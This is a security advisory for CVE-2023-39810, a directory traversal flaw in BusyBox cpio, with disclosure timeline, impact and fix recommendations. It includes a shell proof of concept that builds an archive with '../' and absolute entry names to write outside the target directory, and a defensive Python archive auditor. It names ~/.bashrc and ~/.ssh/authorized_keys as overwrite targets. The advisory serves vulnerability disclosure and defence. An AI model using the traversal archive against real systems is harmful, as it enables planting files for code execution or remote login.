CVE-2023-39810: Busybox cpio directory traversal vulnerability (CVE-2023-39810)

An issue in the CPIO command of Busybox v1.33.2 allows attackers to execute a directory traversal.


When extracting cpio archives with BusyBox cpio, the cpio archiving tools may write files outside the destination directory and there is no option to prevent this.

Summary

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L, 6.1 Medium

cpio is an archive format and also an archive handling tool. Several implementations exist, for example GNU cpio, bsdcpio, and BusyBox cpio. The BusyBox variant of cpio has been found to extract archives that contain relative file names starting with ../, and this cannot be prevented.

While bsdcpio ignores archived files that have absolute file names or start with ../, and GNU cpio has a parameter to prevent extracting such file names, BusyBox processes archives with such names and has no parameter for handling potentially untrusted archives.

Impact

If untrusted archives are extracted, files may be written outside the destination directory. This could overwrite files that contain configuration in the form of shell scripts, such as ~/.bashrc, or files that enable a login from a remote side, such as ~/.ssh/authorized_keys.

Timeline

  • 2023-07-24: Vulnerability noticed.

  • 2023-07-26: Initial contact of BusyBox maintainer via e-mail.

  • 2023-08-01: Second try to contact the BusyBox maintainer via e-mail. First try to contact the developer of the module, but the e-mail bounced. First contact with the Debian security team, because the BusyBox package is available via Debian packages.

  • 2023-08-24: CVE-2023-39810 was assigned.

  • 2023-08-28: Advisory published after not being able to get in contact with maintainer or developer.

Affected Components

The issue affects BusyBox cpio in multiple versions on different platforms. Pentagrid tested the following versions and could successfully reproduce the issue.

  • BusyBox v1.33.2

  • BusyBox v1.30.1

Technical Details

Processing relative and absolute file names taken from an archive is risky. For example, the GNU cpio program was affected by the same vulnerability, referenced as “CVE-2005-1229 - Directory traversal vulnerability in cpio 2.6 and earlier allows remote attackers to write to arbitrary directories via a .. (dot dot) in a cpio file.” A patch was developed and added to cpio 2.6-6, which requires the additional parameter --no-absolute-filenames to prevent files from being overwritten. This option also works for relative file names. This is still an insecure default, but an improvement.

BusyBox cpio is another implementation, but it has no similar mechanism to avoid processing relative file names, as the proof of concept below shows:

    #!/bin/sh
    set -e

    echo + Clean-up
    rm -rf /tmp/testcase

    echo + Create a test archive
    mkdir -p /tmp/testcase/a/b/
    echo test > /tmp/testcase/testfile
    cd /tmp/testcase/a/b/
    # Archive one relative name that climbs out of the working directory and one absolute name.
    (echo ../../testfile; echo /etc/hostname) | cpio -ov -H newc -O /tmp/testcase/a/b/archive.cpio --quiet
    rm /tmp/testcase/testfile

    echo + Extract archive
    mkdir /tmp/testcase/a/b/etc
    # Trace the extraction and show only the file operations on the two archived names.
    strace -f busybox cpio -iv < archive.cpio 2>&1 | grep 'hostname\|testfile' | grep -v read

    echo + List files
    find /tmp/testcase/

The final find command lists extracted files:

    /tmp/testcase/
    /tmp/testcase/testfile                <-- extracted rel. file
    /tmp/testcase/a
    /tmp/testcase/a/b                     <-- working directory
    /tmp/testcase/a/b/etc
    /tmp/testcase/a/b/etc/hostname        <-- extracted abs. file
    /tmp/testcase/a/b/archive.cpio        <-- archive to extract

According to the output above, the testfile is written outside of the working directory.

Precondition

An untrusted archive is extracted with the BusyBox cpio tool and the running cpio process has permissions to write files outside the destination directory.

Recommendation

Pentagrid recommends changing the default behaviour and ignoring relative file names within a cpio archive. To process files with relative file names, a command line flag could be introduced, as was done for GNU cpio.

Users can specify on the BusyBox cpio command line which file names should be unpacked, which should be safe as long as the file name argument itself contains no directory traversal.
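As an added example (not Pentagrid's code and not part of BusyBox), the following Python audits a newc-format cpio archive before anything is extracted and flags the two name classes this advisory describes: absolute paths and names containing a ".." component, which is what bsdcpio ignores and what the recommended default would do. The archive it inspects is constructed in memory to mirror the proof of concept above; the entry names are the same, the file contents are made up.

```python
NEWC_MAGIC = b"070701"
HEADER_LEN = 110  # magic + 13 fields of 8 ASCII hex digits each

def _pad4(n):
    """newc aligns header+name and file data to 4-byte boundaries."""
    return (n + 3) & ~3

def build_newc(entries):
    """Build a minimal newc archive from (name, bytes) pairs. Constructed
    test data for this example: regular files, no metadata preserved."""
    out = bytearray()
    for ino, (name, data) in enumerate(list(entries) + [("TRAILER!!!", b"")], 1):
        name_b = name.encode() + b"\0"
        fields = [ino, 0o100644, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(name_b), 0]
        head = NEWC_MAGIC + b"".join(b"%08x" % f for f in fields) + name_b
        out += head + b"\0" * (_pad4(len(head)) - len(head))
        out += data + b"\0" * (_pad4(len(data)) - len(data))
    return bytes(out)

def unsafe_name(name):
    """Reason the entry would escape the destination directory, or None."""
    if name.startswith("/"):
        return "absolute path"
    if ".." in name.split("/"):
        return "parent-directory component"
    return None

def audit_newc(data):
    """Walk the headers only (nothing is written to disk) and return
    {name: reason} for every entry that must not be extracted."""
    pos, findings = 0, {}
    while pos + HEADER_LEN <= len(data):
        head = data[pos:pos + HEADER_LEN]
        if head[:6] != NEWC_MAGIC:
            raise ValueError("bad newc magic at offset %d" % pos)
        filesize = int(head[54:62], 16)   # field 7
        namesize = int(head[94:102], 16)  # field 12, includes the NUL
        name = data[pos + HEADER_LEN:pos + HEADER_LEN + namesize - 1].decode()
        if name == "TRAILER!!!":
            break
        reason = unsafe_name(name)
        if reason:
            findings[name] = reason
        pos += _pad4(HEADER_LEN + namesize) + _pad4(filesize)
    return findings

# Same names as the proof of concept above, plus one benign entry (constructed).
SAMPLE = build_newc([("../../testfile", b"test\n"), ("/etc/hostname", b"x\n"),
                     ("etc/motd", b"hi\n")])
```

Running `audit_newc(SAMPLE)` reports the two traversing names and leaves `etc/motd` alone; a wrapper would refuse to extract an archive for which the result is non-empty.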

Credits

The vulnerability has been found by Tobias Ospelt and Martin Schobert of Pentagrid.
